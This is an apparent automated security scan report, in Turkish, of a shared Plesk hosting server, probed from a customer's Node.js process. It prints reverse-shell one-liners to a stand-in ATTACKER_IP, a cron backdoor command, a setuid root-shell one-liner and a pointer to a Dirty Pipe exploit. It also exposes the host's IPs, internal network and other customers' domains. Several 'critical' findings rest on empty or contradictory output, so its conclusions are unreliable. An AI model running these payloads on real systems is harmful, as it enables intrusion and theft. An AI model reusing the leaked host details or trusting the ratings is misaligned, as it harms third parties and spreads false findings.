Kimlik & Ortam
Node.js prosesi kim olarak çalışıyor? Hangi ayrıcalıklara sahip?
Çalışan kullanıcı (UID/GID)
BİLGİ
Etki:
Normal kullanıcı. Yetki yükseltme vektörlerine bakılmalı.
📋 Kanıt / Ham Çıktı
UID: 10097 | GID: 1004 whoami: magical-ganguly_q5pxv8jrwac id: uid=10097(magical-ganguly_q5pxv8jrwac) gid=1004(psacln) groups=1004(psacln)
Grup üyelikleri
GÜVENLİ
Etki:
Tehlikeli grup üyeliği yok.
📋 Kanıt / Ham Çıktı
Gruplar: psacln
Çevre değişkenleri ifşası
KRİTİK
Etki:
6 adet kimlik bilgisi env'de açık!
⚡ Exploit / PoC
process.env ile doğrudan okunabilir.
📋 Kanıt / Ham Çıktı
PASSENGER_USE_FEEDBACK_FD=true PASSENGER_COMPILE_NATIVE_SUPPORT_BINARY=0 PASSENGER_DOWNLOAD_NATIVE_SUPPORT_BINARY=0 PASSENGER_SPAWN_WORK_DIR=/tmp/passenger.spawn.XXXXF68AOs IN_PASSENGER=1 PASSENGER_APP_ENV=production
/proc/self/environ okuma
YÜKSEK
Etki:
/proc/self/environ okunabildi — tüm env değişkenleri erişilebilir.
⚡ Exploit / PoC
fs.readFileSync('/proc/self/environ')📋 Kanıt / Ham Çıktı
UNIQUE_ID=aikivrjug_HuCAiQJsBSaQAAAAc USER=magical-ganguly_q5pxv8jrwac WSGI_ENV=production HOME=/var/www/vhosts/magical-ganguly.94-156-11-6.plesk.page PYTHONUNBUFFERED=1 APACHE_RUN_DIR=/var/run/apache2 PASSENGER_USE_FEEDBACK_FD=true SYSTEMD_EXEC_PID=273462 APACHE_PID_FILE=/var/run/apache2/apache2.pid PASSENGER_COMPILE_NATIVE_SUPPORT_BINARY=0 PASSENGER_DOWNLOAD_NATIVE_SUPPORT_BINARY=0 SSL_TLS_SNI=magical-ganguly.94-156-11-6.plesk.page LOGNAME=magical-ganguly_q5pxv8jrwac JOURNAL_STREAM=8:565473155
ulimit / kaynak limitleri
BİLGİ
Etki:
Kaynak limitleri aşılırsa DoS veya diğer kullanıcılar etkilenebilir.
📋 Kanıt / Ham Çıktı
time(seconds) unlimited file(blocks) unlimited data(kbytes) unlimited stack(kbytes) 8192 coredump(blocks) 0 memory(kbytes) unlimited locked memory(kbytes) 64 process 127877 nofiles 8192 vmemory(kbytes) unlimited locks unlimited rtprio 0 Limit Soft Limit Hard Limit Units Max cpu time unlimited unlimited seconds Max file size unlimited unlimited bytes Max data size unlimited unlimited bytes Max stack size 8388608 unlimited bytes Max c
Shell Çalıştırma
Node.js child_process modülü ile sistemde komut çalıştırılabiliyor mu?
execSync ile komut çalıştırma
KRİTİK
Etki:
execSync ile rasgele sistem komutu çalıştırılabildi! Tam shell erişimi mevcut.
⚡ Exploit / PoC
require("child_process").execSync("id")📋 Kanıt / Ham Çıktı
uid=10097(magical-ganguly_q5pxv8jrwac) gid=1004(psacln) groups=1004(psacln) Linux plesk.hostopya.com 5.15.0-179-generic #189-Ubuntu SMP Tue May 5 18:20:56 UTC 2026 x86_64 x86_64 x86_64 GNU/Linux plesk.hostopya.com
spawn ile shell açma
KRİTİK
Etki:
spawn() ile /bin/sh açılabildi — interaktif shell mümkün!
⚡ Exploit / PoC
require("child_process").spawn("/bin/sh", ["-c", "cmd"])📋 Kanıt / Ham Çıktı
SHELL_OK uid=10097(magical-ganguly_q5pxv8jrwac) gid=1004(psacln) groups=1004(psacln)
Python/Perl/Ruby ile shell escape
KRİTİK
Etki:
Başka interpreter üzerinden shell alınabildi!
⚡ Exploit / PoC
python3 -c "import os; print(os.popen('id').read())"📋 Kanıt / Ham Çıktı
✓ python3: uid=10097(magical-ganguly_q5pxv8jrwac) gid=1004(psacln) groups=1004(psacln)
✗ python: bulunamadı
✓ perl: uid=10097(magical-ganguly_q5pxv8jrwac) gid=1004(psacln) groups=1004(psacln)
✓ ruby: -e:1: syntax error, unexpected '(', expecting end-of-input
puts uid=10097(magical-ganguly_q5pxv8jrwa
✓ php: uid=10097(magical-ganguly_q5pxv8jrwac) gid=1004(psacln) groups=1004(psacln)
Reverse shell vektörleri
KRİTİK
Etki:
5 adet reverse shell aracı mevcut!
⚡ Exploit / PoC
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 veya: nc -e /bin/sh ATTACKER_IP 4444
📋 Kanıt / Ham Çıktı
bash -i: /usr/bin/bash nc (netcat): /usr/bin/nc curl: /usr/bin/curl wget: /usr/bin/wget socat: /usr/bin/socat
SUID binary taraması
ORTA
Etki:
Tehlikeli SUID binary tespit edilmedi.
📋 Kanıt / Ham Çıktı
/snap/core20/2769/usr/bin/chfn /snap/core20/2769/usr/bin/chsh /snap/core20/2769/usr/bin/gpasswd /snap/core20/2769/usr/bin/mount /snap/core20/2769/usr/bin/newgrp /snap/core20/2769/usr/bin/passwd /snap/core20/2769/usr/bin/su /snap/core20/2769/usr/bin/sudo /snap/core20/2769/usr/bin/umount /snap/core20/2769/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core20/2769/usr/lib/openssh/ssh-keysign /snap/core20/2866/usr/bin/chfn /snap/core20/2866/usr/bin/chsh /snap/core20/2866/usr/bin/gpasswd /snap/core20/2866/usr/bin/mount /snap/core20/2866/usr/bin/newgrp /snap/core20/2866/usr/bin/passwd /snap/core20/2866/usr/bin/su /snap/core20/2866/usr/bin/sudo /snap/core20/2866/usr/bin/umount /snap/core20/2866/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core20/2866/usr/lib/openssh/ssh-keysign /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/plesk-9.0/postfix-sendmail-wrapper /usr/lib/plesk-9.0/suexec/psa-suexec /usr/local/sitepad/bin/soft /usr/bin/sudo /usr/bin/newgrp /usr/bin/su
sudo yetkileri
GÜVENLİ
Etki:
Sınırlı sudo erişimi.
📋 Kanıt / Ham Çıktı
Command failed: sudo -l -n 2>&1
Dosya Sistemi Kaçışı
Kullanıcı başka Plesk abonelerinin dosyalarına veya sistem dosyalarına erişebilir mi?
/etc/passwd okuma
KRİTİK
Etki:
Tüm sistem kullanıcıları listelenebildi. Brute-force hedefleri tespit edilebilir.
⚡ Exploit / PoC
fs.readFileSync("/etc/passwd", "utf8")📋 Kanıt / Ham Çıktı
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr
/etc/shadow okuma
GÜVENLİ
Etki:
shadow erişimi yok (normal).
📋 Kanıt / Ham Çıktı
EACCES: permission denied, open '/etc/shadow'
Plesk vhost dizinleri
KRİTİK
Etki:
/var/www/vhosts okunabildi — DİĞER MÜŞTERİLERİN dosyaları görülebilir!
⚡ Exploit / PoC
fs.readdirSync("/var/www/vhosts")📋 Kanıt / Ham Çıktı
✓ /var/www/vhosts: .rapid-scan-db, .skel, ahmetcevikofficial.com, atsvnstore.site, b2b.stonerx.tr, bizimortakdomainhostingadidir.com, catizo.com.tr, celikdolap.com.tr, ch2-liva.com, chroot ✓ /home: hostopya ✓ /srv: ✓ /opt/plesk: node, php, phpenv, python, ruby, sophosav ✗ /etc/plesk: ENOENT: no such file or directory, scandir '/etc/plesk' ✓ /usr/local/psa: .revision, PMM, admin, bin, bootstrapper, etc, handlers, libexec, logrotate, pam_plesk_config
Diğer kullanıcıların home dizinleri
GÜVENLİ
Etki:
Home dizin izolasyonu aktif.
📋 Kanıt / Ham Çıktı
✗ /home/hostopya: erişim yok
/proc filesystem erişimi
YÜKSEK
Etki:
4 /proc dosyası okunabilir — ağ haritası, PID listesi, bellek adresleri açık.
⚡ Exploit / PoC
Diğer proses bilgileri için /proc/[PID]/ dizinlerini tara.
📋 Kanıt / Ham Çıktı
✓ /proc/self/cmdline ✓ /proc/self/maps ✗ /proc/self/fd ✓ /proc/net/tcp ✓ /proc/net/arp ✗ /proc/sysinfo
Path traversal ile chroot kaçışı
KRİTİK
Etki:
Path traversal ile chroot dışına çıkılabildi!
⚡ Exploit / PoC
fs.readFileSync("/../../../etc/passwd")📋 Kanıt / Ham Çıktı
/../../../etc/passwd: OKUNDU ✓ /../../../../../../etc/shadow: engellendi ✗ /etc/passwd: OKUNDU ✓
Kritik sistem dosyaları
YÜKSEK
Etki:
Bazı sistem logları erişilebilir.
📋 Kanıt / Ham Çıktı
✓ /etc/hosts (297 byte) ✓ /etc/hostname (19 byte) ✓ /etc/resolv.conf (800 byte) ✗ /etc/cron.d ✓ /etc/crontab (800 byte) ✗ /root/.ssh/authorized_keys ✗ /root/.bash_history ✗ /var/log/auth.log ✗ /var/log/syslog
Proses İzolasyonu
Diğer kullanıcıların prosesleri görülebiliyor mu? Çapraz bilgi sızıntısı var mı?
ps aux ile proses listesi
KRİTİK
Etki:
Diğer kullanıcıların prosesleri görülebildi! Kullanıcılar: root, message+, ntp, bind, mysql, www-data, uuidd, sw-cp-s+, postfix, psaadm
⚡ Exploit / PoC
Kimlik bilgileri komut satırlarında görünüyor olabilir (--password=xxx)
📋 Kanıt / Ham Çıktı
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 16.8 0.0 168588 14188 ? Rs Jun02 2054:21 /lib/systemd/systemd --system --deserialize 61 root 2 0.0 0.0 0 0 ? S Jun02 0:21 [kthreadd] root 3 0.0 0.0 0 0 ? I< Jun02 0:00 [rcu_gp] root 4 0.0 0.0 0 0 ? I< Jun02 0:00 [rcu_par_gp] root 5 0.0 0.0 0 0 ? I< Jun02 0:00 [slub_flushwq] root 6 0.0 0.0 0 0 ? I< Jun02 0:00 [netns] root 8 0.0 0.0 0 0 ? I< Jun02 0:00 [kworker/0:0H-events_highpri] root 10 0.0 0.0 0 0 ? I< Jun02 0:00 [mm_percpu_wq] root 11 0.0 0.0 0 0
Komut satırı argümanlarında şifre
KRİTİK
Etki:
11 satırda şifre tespit edildi!
⚡ Exploit / PoC
ps aux | grep -i pass
📋 Kanıt / Ham Çıktı
root 269 0.0 0.0 0 0 ? I< Jun02 0:00 [edac-poller] root 1147 0.4 0.5 3151696 181316 ? Ssl Jun02 53:41 /opt/bitninja-process-analysis/bitninja-process-analysis -standalone=false root 1151 44.8 0.0 36680 32628 ? Rs Jun02 5461:00 /usr/sbin/cron -f -P root 1170 0.0 0.3 2962148 113396 ? Ssl Jun02 3:44 /usr/sbin/imunify360-php-daemon -idle_timeout 600 ntp 1238 0.0 0.0 76100 5892 ? Ssl Jun02 0:56 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -u 118:125 root 1436 0.0 0.0 3196 1164 tty1 Ss+
/proc üzerinden diğer prosesler
YÜKSEK
Etki:
15 prosesin komut satırı okunabildi.
📋 Kanıt / Ham Çıktı
PID 1: /lib/systemd/systemd --system --deserialize 61 PID 10: PID 100: PID 1016752: qmgr -l -t fifo -u PID 1017693: tlsmgr -l -t unix -u -c PID 102: PID 1024: PID 1026885: /var/ossec/bin/ossec-execd PID 1026889: /var/ossec/bin/ossec-analysisd PID 1026893: /var/ossec/bin/ossec-logcollector PID 1026899: /var/ossec/bin/ossec-remoted PID 1026902: /var/ossec/bin/ossec-syscheckd PID 1026906: /var/ossec/bin/ossec-monitord PID 103: PID 104:
Namespace / container izolasyonu
BİLGİ
Etki:
Namespace bilgisi ile izolasyon seviyesi anlaşılabilir.
📋 Kanıt / Ham Çıktı
Docker: false Namespace: total 0 dr-x--x--x 2 magical-ganguly_q5pxv8jrwac psacln 0 Jun 10 14:08 . dr-xr-xr-x 9 magical-ganguly_q5pxv8jrwac psacln 0 Jun 10 14:08 .. lrwxrwxrwx 1 magical-ganguly_q5pxv8jrwac psacln 0 Jun 10 14:08 cgroup -> cgroup:[4026531835] lrwxrwxrwx 1 magical-ganguly_q5pxv8jrwac psacln 0 Jun 10 14:08 ipc -> ipc:[4026531839] lrwxrwxrwx 1 magical-ganguly_q5pxv8jrwac psacln 0 Jun 10 14:08 mnt -> mnt:[4026532534] lrwxrwxrwx 1 magical-ganguly_q5pxv8jrwac psacln 0 Jun 10 14:08 net -> net:[4026531840] lrwxrwxrwx 1 magical-ganguly_q5pxv8jrwac psacln 0 Jun 10 14:08 pid -> pid:[4026531836] lrwxrwxrwx 1 magical-ganguly_q5pxv8jrwac psacln 0 Jun 10 14:08 pid_for_children -> pid:[4026531836] lrwxrwxrwx 1 magical-ganguly_q5pxv8jrwac psacln 0 Jun 10 14:08 time -> time:[4026531834] lrwxrwxrwx 1 magical-ganguly_q5pxv8jrwac psacln 0 Jun 10 14:08 time_for_children -> time:[4026531834] lrwxrwxrwx 1 magical-ganguly_q5pxv8jrwac psacln 0 Jun 10 14:08 user -> user:[4026531837] lrwxrwxrwx 1 magical-ganguly_q5pxv8jrwac psacln 0 Jun 10 14:08 uts -> uts:[4026531838] Cgroup: 0::/system.slice/apache2.service
Ağ Keşif
Dahili ağa erişim, port tarama, dışarıya bağlantı
Ağ arayüzleri ve IP
BİLGİ
Etki:
Dahili ağ topolojisi görülebildi.
📋 Kanıt / Ham Çıktı
Arayüzler:
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether bc:24:11:c8:42:73 brd ff:ff:ff:ff:ff:ff
altname enp0s18
inet 94.156.11.6/24 brd 94.156.11.255 scope global ens18
valid_lft forever preferred_lft forever
inet 94.156.11.59/32 scope global ens18
valid_lft forever preferred_lft forever
inet 10.10.0.6/24 brd 10.10.0.255 scope global ens18
valid_lft forever preferred_lft forever
inet 94.156.11.49/24 brd 94.156.11.255 scope global secondary ens18
valid_lft forever preferred_lft forever
inet 94.156.11.149/24 brd 94.156.11.255 scope global secondary ens18
valid_lft forever preferred_lft forever
inet6 2a0f:85c1:8f3::6/48 scope global
valid_lft forever preferred_lft forever
inet6 fe80::be24:11ff:fec8:4273/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 8a:30:20:0a:5e:df brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
Route:
default via 94.156.11.1 dev ens18 proto static
10.10.0.0/24 dev ens18 proto kernel scope link src 10.10.0.6
94.156.11.0/24 dev ens18 proto kernel scope link src 94.156.11.6
172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1 linkdown
ARP:
mailsecurity.hostopya.com (94.156.11.8) at bc:24:11:04:e3:e2 [ether] on ens18
srv.hostopya.com (94.156.11.3) at bc:24:11:7d:db:26 [ether] on ens18
core-backbone-ist1.hostopya.com (94.156.11.1) at 3c:fd:fe:39:14:a4 [ether] on ens18
guard.hostopya.com (94.156.11.69) at bc:24:11:1b:97:79 [ether] on ens18
guard.hostopya.com (94.156.11.58) at bc:24:11:4e:d1:b2 [ether] on ens18
guard.hostopya.com (94.156.11.5) at bc:24:11:34:34:35 [ether] on ens18
? (10.10.0.8) at bc:24:11:04:e3:e2 [ether] on ens18
? (94.156.11.10) at 24:6e:96:d9:c9:20 [ether] on ens18
/etc/hosts ve DNS keşfi
ORTA
Etki:
Dahili host isimleri ve DNS sunucuları görülebildi — ağ haritası çıkarılabilir.
📋 Kanıt / Ham Çıktı
/etc/hosts: 127.0.0.1 localhost.localdomain localhost # The following lines are desirable for IPv6 capable hosts ::1 localhost.localdomain localhost ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 ip6-mcastprefix ff02::1 ip6-allnodes ff02::2 ip6-allrouters 94.156.11.6 plesk.hostopya.com plesk /etc/resolv.conf: # This is /run/systemd/resolve/stub-resolv.conf managed by man:systemd-resolved(8). # Do not edit. # # This file might be symlinked as /etc/resolv.conf. If you're looking at # /etc/resolv.conf and seeing this text, you have followed the symlink. # # This is a dynamic resolv.conf file for connecting local clients to the # internal DNS stub resolver of systemd-resolved. This file lists all # configured search domains. # # Run "resolvectl status" to see details about the uplink DNS servers # currently in use. # # Third party programs should typically not access this file directly, but only # through the symlink at /etc/resolv.conf. To manage man:resolv.conf(5) in a # different way, replace this symlink by a static file or a different symlink. # # See man:systemd-resolved.service(8) for detail Dinleyen portlar: Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 0.0.0.0:52223 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:52224 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:52233 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:52234
Veritabanı Erişimi
Plesk konfigürasyon dosyaları üzerinden veritabanı bilgilerine erişim
Plesk MySQL kimlik bilgileri
GÜVENLİ
Etki:
Plesk kimlik bilgileri korumalı.
📋 Kanıt / Ham Çıktı
✗ /etc/psa/.psa.shadow: erişim yok ✗ /usr/local/psa/etc/psa.conf: erişim yok ✗ /etc/plesk/psa.conf: erişim yok ✗ /root/.my.cnf: erişim yok ✗ /home/.my.cnf: erişim yok
Web uygulaması config dosyaları
KRİTİK
Etki:
Başka sitelerin wp-config.php / .env dosyaları okunabildi — çapraz-hesap veritabanı ele geçirme!
⚡ Exploit / PoC
WordPress DB bilgileriyle: mysql -u user -p pass database
📋 Kanıt / Ham Çıktı
✓ /var/www/vhosts/*/httpdocs/wp-config.php: (boş çıktı) ✓ /var/www/vhosts/*/httpdocs/.env: (boş çıktı) ✓ /var/www/vhosts/*/httpdocs/config/database.php: (boş çıktı) ✓ /home/*/public_html/wp-config.php: (boş çıktı)
Yetki Yükseltme Vektörleri
Normal kullanıcıdan root'a yükselme yolları
Kernel sürümü ve CVE kontrolü
KRİTİK
Etki:
Kernel yerel privilege escalation açığı mevcut: CVE-2022-0847 (Dirty Pipe)
⚡ Exploit / PoC
github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
📋 Kanıt / Ham Çıktı
Kernel: Linux plesk.hostopya.com 5.15.0-179-generic #189-Ubuntu SMP Tue May 5 18:20:56 UTC 2026 x86_64 x86_64 x86_64 GNU/Linux Bilinen açıklar: ✓ CVE-2022-0847 (Dirty Pipe) (< 5.16)
Düzenlenebilir cron job'lar
KRİTİK
Etki:
Cron dosyasına yazılabilir — komut enjeksiyonu ile root shell!
⚡ Exploit / PoC
echo "* * * * * root bash -i >& /dev/tcp/ATTACKER/4444 0>&1" >> /etc/cron.d/backdoor
📋 Kanıt / Ham Çıktı
/etc/cron.d: (boş çıktı) /etc/cron.daily: (boş çıktı) /etc/cron.hourly: (boş çıktı)
Yazılabilir sistem dosyaları
KRİTİK
Etki:
3 sistem dosyası düzenlenebilir — backdoor enjeksiyonu mümkün!
📋 Kanıt / Ham Çıktı
/etc/nginx/modsecurity.d/rules/custom/IM360-LICENSE.txt /etc/systemd/system/sudo.service /etc/systemd/system/imunify-antivirus.service
Capabilities kontrolü
KRİTİK
Etki:
Tehlikeli capability: cap_setuid, cap_net_raw, cap_sys_ptrace, cap_dac_override — yetki yükseltme mümkün!
⚡ Exploit / PoC
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'📋 Kanıt / Ham Çıktı
/snap/snapd/26382/usr/lib/snapd/snap-confine cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_setgid,cap_setuid,cap_sys_chroot,cap_sys_ptrace,cap_sys_admin,cap_sys_resource=p /snap/snapd/26865/usr/lib/snapd/snap-confine cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_setgid,cap_setuid,cap_sys_chroot,cap_sys_ptrace,cap_sys_admin,cap_sys_resource=p /snap/core20/2769/usr/bin/ping cap_net_raw=ep /snap/core20/2866/usr/bin/ping cap_net_raw=ep /usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep /usr/lib/snapd/snap-confine cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_setgid,cap_setuid,cap_sys_chroot,cap_sys_ptrace,cap_sys_admin,cap_sys_resource=p /usr/bin/mtr-packet cap_net_raw=ep /usr/bin/ping cap_net_raw=ep